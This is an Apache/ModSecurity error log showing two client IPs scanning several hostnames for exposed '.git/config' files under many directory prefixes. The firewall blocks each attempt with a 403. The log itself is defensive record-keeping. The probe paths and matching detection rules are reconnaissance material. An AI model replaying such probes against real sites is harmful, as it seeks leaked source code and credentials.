[Wed May 29 05:15:29.653281 2024] [:error] [pid 3548008] [client 91.215.85.43:40904] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wp-content/themes/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/themes/.git/config"] [unique_id "Zlad0TVffgeDK1niMsA3WgAAAAA"]
[Wed May 29 05:15:29.653579 2024] [:error] [pid 3548008] [client 91.215.85.43:40904] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/themes/.git/config"] [unique_id "Zlad0TVffgeDK1niMsA3WgAAAAA"]
[Wed May 29 05:15:29.653786 2024] [:error] [pid 3548008] [client 91.215.85.43:40904] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/themes/.git/config"] [unique_id "Zlad0TVffgeDK1niMsA3WgAAAAA"]
[Wed May 29 05:15:29.654617 2024] [:error] [pid 3548010] [client 91.215.85.43:40810] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /site/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.git/config"] [unique_id "Zlad0Zo1Ctr6j2zupIZcTAAAAAI"]
[Wed May 29 05:15:29.655709 2024] [:error] [pid 3548012] [client 91.215.85.43:40730] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /public/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.git/config"] [unique_id "Zlad0XVn6hFxwDs0XlWQQgAAAAQ"]
[Wed May 29 05:15:29.655991 2024] [:error] [pid 3548012] [client 91.215.85.43:40730] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.git/config"] [unique_id "Zlad0XVn6hFxwDs0XlWQQgAAAAQ"]
[Wed May 29 05:15:29.656204 2024] [:error] [pid 3548012] [client 91.215.85.43:40730] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.git/config"] [unique_id "Zlad0XVn6hFxwDs0XlWQQgAAAAQ"]
[Wed May 29 05:15:29.657419 2024] [:error] [pid 3548013] [client 91.215.85.43:40922] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /store/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/store/.git/config"] [unique_id "Zlad0fy2I6587Lelj0kpogAAAAU"]
[Wed May 29 05:15:29.657705 2024] [:error] [pid 3548009] [client 91.215.85.43:40762] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /test/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/test/.git/config"] [unique_id "Zlad0TUhJF2MEn3X500KzQAAAAE"]
[Wed May 29 05:15:29.657944 2024] [:error] [pid 3548013] [client 91.215.85.43:40922] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/store/.git/config"] [unique_id "Zlad0fy2I6587Lelj0kpogAAAAU"]
[Wed May 29 05:15:29.657993 2024] [:error] [pid 3548009] [client 91.215.85.43:40762] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/test/.git/config"] [unique_id "Zlad0TUhJF2MEn3X500KzQAAAAE"]
[Wed May 29 05:15:29.658199 2024] [:error] [pid 3548009] [client 91.215.85.43:40762] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/test/.git/config"] [unique_id "Zlad0TUhJF2MEn3X500KzQAAAAE"]
[Wed May 29 05:15:29.658327 2024] [:error] [pid 3548013] [client 91.215.85.43:40922] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/store/.git/config"] [unique_id "Zlad0fy2I6587Lelj0kpogAAAAU"]
[Wed May 29 05:15:29.659736 2024] [:error] [pid 3549624] [client 91.215.85.43:40878] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /v1/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.git/config"] [unique_id "Zlad0eHPBWXp6Kzvr44XcgAAAAc"]
[Wed May 29 05:15:29.659993 2024] [:error] [pid 3549624] [client 91.215.85.43:40878] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.git/config"] [unique_id "Zlad0eHPBWXp6Kzvr44XcgAAAAc"]
[Wed May 29 05:15:29.660193 2024] [:error] [pid 3549624] [client 91.215.85.43:40878] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.git/config"] [unique_id "Zlad0eHPBWXp6Kzvr44XcgAAAAc"]
[Wed May 29 05:15:29.660834 2024] [:error] [pid 3548010] [client 91.215.85.43:40810] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.git/config"] [unique_id "Zlad0Zo1Ctr6j2zupIZcTAAAAAI"]
[Wed May 29 05:15:29.661036 2024] [:error] [pid 3548010] [client 91.215.85.43:40810] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.git/config"] [unique_id "Zlad0Zo1Ctr6j2zupIZcTAAAAAI"]
[Wed May 29 05:15:29.661199 2024] [:error] [pid 3549404] [client 91.215.85.43:40714] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/staging/.git/config"] [unique_id "Zlad0S1nmPbRu49M09_78gAAAAY"]
[Wed May 29 05:15:29.750993 2024] [:error] [pid 3548011] [client 91.215.85.43:40770] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /qa/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/qa/.git/config"] [unique_id "Zlad0Z263y1OHB1HvF3_8AAAAAM"]
[Wed May 29 05:15:29.751476 2024] [:error] [pid 3548011] [client 91.215.85.43:40770] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/qa/.git/config"] [unique_id "Zlad0Z263y1OHB1HvF3_8AAAAAM"]
[Wed May 29 05:15:29.751798 2024] [:error] [pid 3548011] [client 91.215.85.43:40770] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/qa/.git/config"] [unique_id "Zlad0Z263y1OHB1HvF3_8AAAAAM"]
[Wed May 29 05:15:29.757290 2024] [:error] [pid 3549404] [client 91.215.85.43:40826] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /src/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.git/config"] [unique_id "Zlad0S1nmPbRu49M09_78wAAAAY"]
[Wed May 29 05:15:29.757793 2024] [:error] [pid 3549404] [client 91.215.85.43:40826] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.git/config"] [unique_id "Zlad0S1nmPbRu49M09_78wAAAAY"]
[Wed May 29 05:15:29.758173 2024] [:error] [pid 3549404] [client 91.215.85.43:40826] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.git/config"] [unique_id "Zlad0S1nmPbRu49M09_78wAAAAY"]
[Wed Jun 05 08:45:34.576306 2024] [:error] [pid 3718942] [client 104.234.204.32:58698] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZmAJjqDYqa2aEj5cON_zOwAAAAg"]
[Wed Jun 05 08:45:34.578627 2024] [:error] [pid 3718942] [client 104.234.204.32:58698] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZmAJjqDYqa2aEj5cON_zOwAAAAg"]
[Wed Jun 05 08:45:34.578827 2024] [:error] [pid 3718942] [client 104.234.204.32:58698] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZmAJjqDYqa2aEj5cON_zOwAAAAg"]
[Wed Jun 05 20:57:51.358605 2024] [:error] [pid 3717561] [client 104.234.204.32:38746] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "ZmC1L1l_1zDd0Rechf5peAAAAAE"]
[Wed Jun 05 20:57:51.358987 2024] [:error] [pid 3717561] [client 104.234.204.32:38746] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "ZmC1L1l_1zDd0Rechf5peAAAAAE"]
[Wed Jun 05 20:57:51.359245 2024] [:error] [pid 3717561] [client 104.234.204.32:38746] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "ZmC1L1l_1zDd0Rechf5peAAAAAE"]
[Thu Jun 06 12:25:11.668638 2024] [authz_core:error] [pid 3740052] [client 104.234.204.32:42816] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.git
[Sat Jun 08 15:22:12.754159 2024] [authz_core:error] [pid 3784618] [client 104.234.204.32:49108] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.git
[Sun Jun 09 13:39:50.994510 2024] [:error] [pid 3814918] [client 104.234.204.32:43768] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /www/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/www/.git/config"] [unique_id "ZmWUhlZHWPlI4shhTnXvJQAAAA4"]
[Sun Jun 09 13:39:50.995912 2024] [:error] [pid 3814918] [client 104.234.204.32:43768] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/www/.git/config"] [unique_id "ZmWUhlZHWPlI4shhTnXvJQAAAA4"]
[Sun Jun 09 13:39:50.996334 2024] [:error] [pid 3814918] [client 104.234.204.32:43768] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/www/.git/config"] [unique_id "ZmWUhlZHWPlI4shhTnXvJQAAAA4"]
[Mon Jun 10 05:17:40.883411 2024] [:error] [pid 3829244] [client 104.234.204.32:38790] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /www/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/www/.git/config"] [unique_id "ZmZwVNAvGLlnWjLjqAYDsgAAAAE"]
[Mon Jun 10 05:17:40.884062 2024] [:error] [pid 3829244] [client 104.234.204.32:38790] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/www/.git/config"] [unique_id "ZmZwVNAvGLlnWjLjqAYDsgAAAAE"]
[Mon Jun 10 05:17:40.884496 2024] [:error] [pid 3829244] [client 104.234.204.32:38790] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/www/.git/config"] [unique_id "ZmZwVNAvGLlnWjLjqAYDsgAAAAE"]
[Thu Jun 13 02:57:42.594850 2024] [:error] [pid 3894455] [client 104.234.204.32:51314] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /assets/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/assets/.git/config"] [unique_id "ZmpEBlJH9RoEJqUNA9lSNQAAAAM"]
[Thu Jun 13 02:57:42.597428 2024] [:error] [pid 3894455] [client 104.234.204.32:51314] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/assets/.git/config"] [unique_id "ZmpEBlJH9RoEJqUNA9lSNQAAAAM"]
[Thu Jun 13 02:57:42.597775 2024] [:error] [pid 3894455] [client 104.234.204.32:51314] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/assets/.git/config"] [unique_id "ZmpEBlJH9RoEJqUNA9lSNQAAAAM"]
